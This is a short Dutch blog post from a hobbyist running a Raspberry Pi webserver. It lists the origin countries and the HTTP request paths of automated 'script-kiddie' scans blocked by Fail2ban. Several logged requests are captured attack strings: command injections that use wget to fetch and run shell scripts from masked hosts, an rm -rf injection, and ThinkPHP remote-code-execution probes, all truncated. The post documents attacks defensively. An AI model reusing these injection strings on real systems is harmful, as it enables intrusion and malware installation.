Server

Script-kiddies 2018

door: webmaster [25-11-2018]

fail2ban.org

Mijn Raspberry Pi webserver wordt geplaagd met merkwaardige HTTP-requests. Ze komen voor in tools van 'script-kiddies'.

Ik maak gebruik van Fail2ban dat serverlogs leest en IP-adressen blokkeert.

Waar komt het 'evil' vandaan?

De top 10!

Land
percentage
  1.  China
44.2%
  2.  United States
10.4%
  3.  Russian Federation
4.6%
  4.  Korea, Republic of
3.3%
  5.  Hong Kong
3.3%
  6.  Germany
2.5%
  7.  Italy
2.5%
  8.  France
2.1%
  9.  Thailand
2.1%
 10.  Netherlands
2.1%

Dit overzicht wordt ieder uur bijgewerkt (00:00) [n=240].

HTTP request
/.git/HEAD
//a2billing/customer/templates/default/footer.tpl
//phpMyAdmin/scripts/setup.php
//vtigercrm/vtigerservice.php
//wp-login.php
/10EA5B2B68D43CE0115002F4C0FD282A.php
/2phpmyadmin/scripts/setup.php
/HNAP1/
/MyAdmin/scripts/setup.php
/PHPMYADMIN/scripts/setup.php
/_query.php
/admin//config.php
/admin/newuser.php
/admin/phpmyadmin/index.php
/bea_wls_deployment_internal
/blog/wp-admin/
/ccvv
/cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64s[..]
/connectors/system/phpthumb.php
/db/scripts/setup.php
/db_cts.php
/db_pma.php
/dbadmin/scripts/setup.php
/demo/wp-admin/
/dev/wp-admin/
/help.php
/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func[..]
/index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_a[..]
/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func[..]
/java.php
/jexinv4/jexinv4.jsp
/language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://x[..]
/license.php
/log.php
/login.cgi?cli=aa%20aa%27;wget%20http://xxx.xxx.xxx.xxx/dlink.sh%20-O%20-%3[..]
/login.cgi?cli=aa%20aa%27;wget%20http://xxx.xxx.xxx.xxx/izuku.sh%20-O%20-%3[..]
/login.cgi?cli=aa%20aa%27;wget%20http://xxx.xxx.xxx.xxx/t.php%27$
/login/
/logon.php
/maker/snwrite.cgi?mac=1234;wget%20http://xxx.xxx.xxx.xxx/airlink.sh%20-O%2[..]
/manager/html
/myadmin/scripts/setup.php
/mysql/admin/index.php?lang=en
/mysql/dbadmin/index.php?lang=en
/mysql/mysqlmanager/index.php?lang=en
/mysql/scripts/setup.php
/mysql/sqlmanager/index.php?lang=en
/mysqladmin/scripts/setup.php
/old/wp-admin/
/otsmobile/app/mgs/mgw.htm?operationType=com.cars.otsmobile.queryLeftTicket[..]
/pHpMyAdMiN/scripts/setup.php
/phpMyAdmin/config/config.inc.php
/phpMyAdmin/css/phpmyadmin.css.php
/phpMyAdmin/libraries/database_interface.lib.php
/phpMyAdmin/scripts/config.inc.php
/phpMyAdmin/scripts/db___.init.php
/phpMyAdmin/scripts/setup.php
/phpMyadmin/index.php?lang=en
/phpmyadmin/4.2/installing/
/phpmyadmin/config.inc.php
/phpmyadmin/config.user.inc.php
/phpmyadmin/config/config.inc.php
/phpmyadmin/config_inf.php
/phpmyadmin/index.php
/phpmyadmin/index.php?lang=en
/phpmyadmin/scripts/config.inc.php
/phpmyadmin/scripts/db___.init.php
/phpmyadmin/scripts/setup.php
/pma/scripts/setup.php
/public/index.php?s=/Index/%09hink%07pp/invokefunction&function=call_user_f[..]
/public/index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user[..]
/servlet?p=login&q=loginForm&jumpto=status
/test.php
/webdav/
/wordpress/wp-admin/
/wp-login.php
/wp-login.php?action=register
/wp/wp-admin/
/xmlrpc.php
http://xxx.xxx.xxx.xxx/echo.php
http://xxx.xxx.xxx.xxx:8518/d7ydbs5bsdhpc1ryl

Dit overzicht wordt ieder uur bijgewerkt (00:00) [n=81].